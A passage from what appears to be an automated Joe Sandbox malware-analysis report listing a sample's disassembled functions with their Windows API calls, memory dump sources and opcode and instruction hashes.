                                                                                              • Opcode Fuzzy Hash: b15f23a6db15962d9f0ecb614da3b4b762128632ffc73df2c1609bc69defd633
                                                                                              • Instruction Fuzzy Hash: 9821F371900209BFDB14ABA0DC85DFFBBB9DF45760B14411DF522A72E1CB38494A9630
                                                                                              Function 00D66332 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D6637F,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D6633E
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D66350
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00D6637F,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66362
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 145871493-3689287502
                                                                                              • Opcode ID: 793565467288f3a288fa4096ae3c07ccf24fbfe8d270bce34315392ad9ad9d74
                                                                                              • Instruction ID: c6874ee58e7326c3bbfaaacac1b1289bbebb9137aa0980db9747e596270db3d2
                                                                                              • Opcode Fuzzy Hash: 793565467288f3a288fa4096ae3c07ccf24fbfe8d270bce34315392ad9ad9d74
                                                                                              • Instruction Fuzzy Hash: 94E08C32682B222B92222B15BC08A7E762BAF86B2270E4115FA00E2340DBB0CC01C4B1
                                                                                              Function 00D662FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DA54C3,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66304
                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D66316
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00DA54C3,?,?,00D660AA,?,00000001,?,?,00000000), ref: 00D66329
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                              • API String ID: 145871493-1355242751
                                                                                              • Opcode ID: 0b46d2d9c955f259f6173431f06b65ee39edd401c65916c0632dd1f406257479
                                                                                              • Instruction ID: 549f862be7b4b609b576f86b716e4f52f2990bce2603b2b85883f349ad54095a
                                                                                              • Opcode Fuzzy Hash: 0b46d2d9c955f259f6173431f06b65ee39edd401c65916c0632dd1f406257479
                                                                                              • Instruction Fuzzy Hash: A8D012356427325742226F25BC189AE7E1BDFC9B1534D4015F900E6368CF60CD01C5B1
                                                                                              Function 00DEACE6 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00DEAD86
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DEAD94
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DEADC7
                                                                                              • CloseHandle.KERNEL32(?), ref: 00DEAF9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3488606520-0
                                                                                              • Opcode ID: 263c51566b7516c2ebbce3b23ab04ec04e6dfdbbe3cfc79f9bb276c5c3438537
                                                                                              • Instruction ID: 29671cd7f6d2249c3aee902b1acfa16ca82bcff566718c718ead795d97d1c46f
                                                                                              • Opcode Fuzzy Hash: 263c51566b7516c2ebbce3b23ab04ec04e6dfdbbe3cfc79f9bb276c5c3438537
                                                                                              • Instruction Fuzzy Hash: 4FA19DB56043019FD720EF28C886B2AB7E5EF44714F14895DF5999B292EA70EC40CBA2
                                                                                              Function 00DEC328 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D6B25F: _wcslen.LIBCMT ref: 00D6B269
                                                                                                • Part of subcall function 00DED2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DEC00D,?,?), ref: 00DED314
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED350
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3C7
                                                                                                • Part of subcall function 00DED2F7: _wcslen.LIBCMT ref: 00DED3FD
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DEC404
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DEC45F
                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DEC4C2
                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00DEC505
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DEC512
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                              • String ID:
                                                                                              • API String ID: 826366716-0
                                                                                              • Opcode ID: 232b294448edfcb6fd6fe8369e12a9963e3f870e44e7514588f18defee2afcad
                                                                                              • Instruction ID: 6941e2d3ed262a17f828cbd33adb6597ff74237c218c874193301191de446bb1
                                                                                              • Opcode Fuzzy Hash: 232b294448edfcb6fd6fe8369e12a9963e3f870e44e7514588f18defee2afcad
                                                                                              • Instruction Fuzzy Hash: 5C618031118281AFD714EF25C494E3ABBE5FF84308F14955DF4998B2A2DB31ED46CBA1
                                                                                              Function 00DCEC27 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00DCE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DCD6E2,?), ref: 00DCE629
                                                                                                • Part of subcall function 00DCE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DCD6E2,?), ref: 00DCE642
                                                                                                • Part of subcall function 00DCE9C5: GetFileAttributesW.KERNELBASE(?,00DCD755), ref: 00DCE9C6
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00DCEC9F
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00DCECD8
                                                                                              • _wcslen.LIBCMT ref: 00DCEE17
                                                                                              • _wcslen.LIBCMT ref: 00DCEE2F
                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DCEE7C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3183298772-0
                                                                                              • Opcode ID: 047d073cf684f309df03381d6442297344db00cb7060ea27f8659b45085e2e77
                                                                                              • Instruction ID: 414367cde62ca6869887af0ac0f8c4afd7ff7e40865ba1edfdfddc2daa5158e0
                                                                                              • Opcode Fuzzy Hash: 047d073cf684f309df03381d6442297344db00cb7060ea27f8659b45085e2e77
                                                                                              • Instruction Fuzzy Hash: B5512FF20083465BC764EB54D881EDBB3EDEF85350F04492EF589D3151EE74A6888B76
                                                                                              Function 00D923E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: e269b83c92910d9cf15a6f5991b38224e6ca8a3ab89046ddb9351211e01cfb13
                                                                                              • Instruction ID: 2830f3021ccd387021762d216fd0101b8aea2418c5c6b3d41534cc38ab01d24b
                                                                                              • Opcode Fuzzy Hash: e269b83c92910d9cf15a6f5991b38224e6ca8a3ab89046ddb9351211e01cfb13
                                                                                              • Instruction Fuzzy Hash: CD41D432A00204AFDF20DF78C881A6EB7E5EF89314F1941A8E515EB255D631ED01CBA0
                                                                                              Function 00DD41CE Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 00DD4225
                                                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DD427C
                                                                                              • TranslateMessage.USER32(?), ref: 00DD42A5
                                                                                              • DispatchMessageW.USER32(?), ref: 00DD42AF
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DD42C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                              • String ID:
                                                                                              • API String ID: 2256411358-0
                                                                                              • Opcode ID: 644cbebc8b895065d4476b143d45bdb9ef06032847d6dc786f313a18375557a2
                                                                                              • Instruction ID: 2bd41e24075005500de891d4c7ed8ef423de8538a6a0bb2b69405393c75606a7
                                                                                              • Opcode Fuzzy Hash: 644cbebc8b895065d4476b143d45bdb9ef06032847d6dc786f313a18375557a2
                                                                                              • Instruction Fuzzy Hash: E03191705443469FEB34CB659849FBA3FA8EB11304F08056FE5A2D63A0E674A889CB35
                                                                                              Function 00DC2191 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00DC21A5
                                                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00DC2251
                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00DC2259
                                                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00DC226A
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DC2272
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3382505437-0
                                                                                              • Opcode ID: 3d130f60350d236e3f0b9f34a459a465ea73ab1041dc2b5d94c7bba8f6c36850
                                                                                              • Instruction ID: 2be33062c965b4f4c21d2ec508741ed579fd022c9d2e6c9ac31217bea901fc5e
                                                                                              • Opcode Fuzzy Hash: 3d130f60350d236e3f0b9f34a459a465ea73ab1041dc2b5d94c7bba8f6c36850
                                                                                              • Instruction Fuzzy Hash: 0331907190021AEFDB14CFA8DD49BAE7BB6EB14315F148219F925E72D0C770A944CBA0
                                                                                              Function 00DF6065 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DF60A4
                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DF60FC
                                                                                              • _wcslen.LIBCMT ref: 00DF610E
                                                                                              • _wcslen.LIBCMT ref: 00DF6119
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DF6175
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 763830540-0
                                                                                              • Opcode ID: ba8a0de9f8ac1e69a92a2ac8cd6acff5e6be1a9fdea6aad9eaee0bd51e70db31
                                                                                              • Instruction ID: 02491ac74144d32a9ec34ee6810db66b7d2c0d3618e533de227865ecc3308e4f
                                                                                              • Opcode Fuzzy Hash: ba8a0de9f8ac1e69a92a2ac8cd6acff5e6be1a9fdea6aad9eaee0bd51e70db31
                                                                                              • Instruction Fuzzy Hash: BF218E3590025CABDB109FA4DC889FEBBB8EB05324F158216FB25EA185E770C585CF70
                                                                                              Function 00DC089E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DC07D1,80070057,?,?,?,00DC0BEE), ref: 00DC08BB
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DC07D1,80070057,?,?), ref: 00DC08D6
                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DC07D1,80070057,?,?), ref: 00DC08E4
                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DC07D1,80070057,?), ref: 00DC08F4
                                                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DC07D1,80070057,?,?), ref: 00DC0900
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3897988419-0
                                                                                              • Opcode ID: 132a1ad16ba00ce46375f890217079bf702c5ec760f147a3c13d3ed384421b4d
                                                                                              • Instruction ID: d90f3eba7110852e7c86bd0e78cbf1f04253a23a31a3f43b626cd7f272d3d486
                                                                                              • Opcode Fuzzy Hash: 132a1ad16ba00ce46375f890217079bf702c5ec760f147a3c13d3ed384421b4d
                                                                                              • Instruction Fuzzy Hash: A2015A76600309EBDB105F64DC04FAA7EAEEF48792F188028F945D3211DB70DE40DAB0
                                                                                              Function 00DD0BCB Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0BE0
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0BED
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0BFA
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0C07
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0C14
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00DD0A39,?,00DD3C56,?,00000001,00DA3ACE,?), ref: 00DD0C21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 3f55e0179328daf0b3b082556109d37486fcf1ce2bc3dba1091ae490e87d5e96
                                                                                              • Instruction ID: 22c87c50c57646e6df05d7410a4c001ae5fb40cc8f71f6fbff0eacd575071b69
                                                                                              • Opcode Fuzzy Hash: 3f55e0179328daf0b3b082556109d37486fcf1ce2bc3dba1091ae490e87d5e96
                                                                                              • Instruction Fuzzy Hash: 7301A271804B15DFC730AF6AD980816FBF5EF903153198A3FD19252A31C7B1A949CFA0
                                                                                              Function 00DC64D3 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00DC64E7
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00DC64FE
                                                                                              • MessageBeep.USER32(00000000), ref: 00DC6516
                                                                                              • KillTimer.USER32(?,0000040A), ref: 00DC6532
                                                                                              • EndDialog.USER32(?,00000001), ref: 00DC654C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: bb35ac8e72eacd053688590c9e75b980f6ad4c5897421c000a56be7eb60c3786
                                                                                              • Instruction ID: 736a56a7d6d24a8ac60b5b7750094bdfead250e322a34ac2fb79bc645dbe8390
                                                                                              • Opcode Fuzzy Hash: bb35ac8e72eacd053688590c9e75b980f6ad4c5897421c000a56be7eb60c3786
                                                                                              • Instruction Fuzzy Hash: 41016D30510709ABEB205B20DD4EFA677BABB10B05F04466DA587E20E1DBF4EA54CBB0
                                                                                              Function 00D92630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00D9264E
                                                                                                • Part of subcall function 00D92D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00D9DB71,00E31DC4,00000000,00E31DC4,00000000,?,00D9DB98,00E31DC4,00000007,00E31DC4,?,00D9DF95,00E31DC4), ref: 00D92D6E
                                                                                                • Part of subcall function 00D92D58: GetLastError.KERNEL32(00E31DC4,?,00D9DB71,00E31DC4,00000000,00E31DC4,00000000,?,00D9DB98,00E31DC4,00000007,00E31DC4,?,00D9DF95,00E31DC4,00E31DC4), ref: 00D92D80
                                                                                              • _free.LIBCMT ref: 00D92660
                                                                                              • _free.LIBCMT ref: 00D92673
                                                                                              • _free.LIBCMT ref: 00D92684
                                                                                              • _free.LIBCMT ref: 00D92695
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 26fbf3284da845e478aa5e1f54f9e966359e699c47e8c834887054ade648e753
                                                                                              • Instruction ID: 69d7b7e75fad053158da866e0dac47e3d36992681117fecd0aa7c3747c661b10
                                                                                              • Opcode Fuzzy Hash: 26fbf3284da845e478aa5e1f54f9e966359e699c47e8c834887054ade648e753
                                                                                              • Instruction Fuzzy Hash: CBF03A70909528AF8B15AF96BC09C693F68FF54751315024EF614B2378C7B00A4BAFF4
                                                                                              Function 00DE6B2D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D805D2: EnterCriticalSection.KERNEL32(00E3170C,?,00000000,?,00D6D1DA,00E33540,00000001,00000000,?,?,00DDEF39,?,?,00000000,00000001,?), ref: 00D805DD
                                                                                                • Part of subcall function 00D805D2: LeaveCriticalSection.KERNEL32(00E3170C,?,00D6D1DA,00E33540,00000001,00000000,?,?,00DDEF39,?,?,00000000,00000001,?,00000001,00E32430), ref: 00D8061A
                                                                                                • Part of subcall function 00D80433: __onexit.LIBCMT ref: 00D80439
                                                                                              • __Init_thread_footer.LIBCMT ref: 00DE6B95
                                                                                                • Part of subcall function 00D80588: EnterCriticalSection.KERNEL32(00E3170C,00000000,?,00D6D208,00E33540,00DA27E9,00000001,00000000,?,?,00DDEF39,?,?,00000000,00000001,?), ref: 00D80592
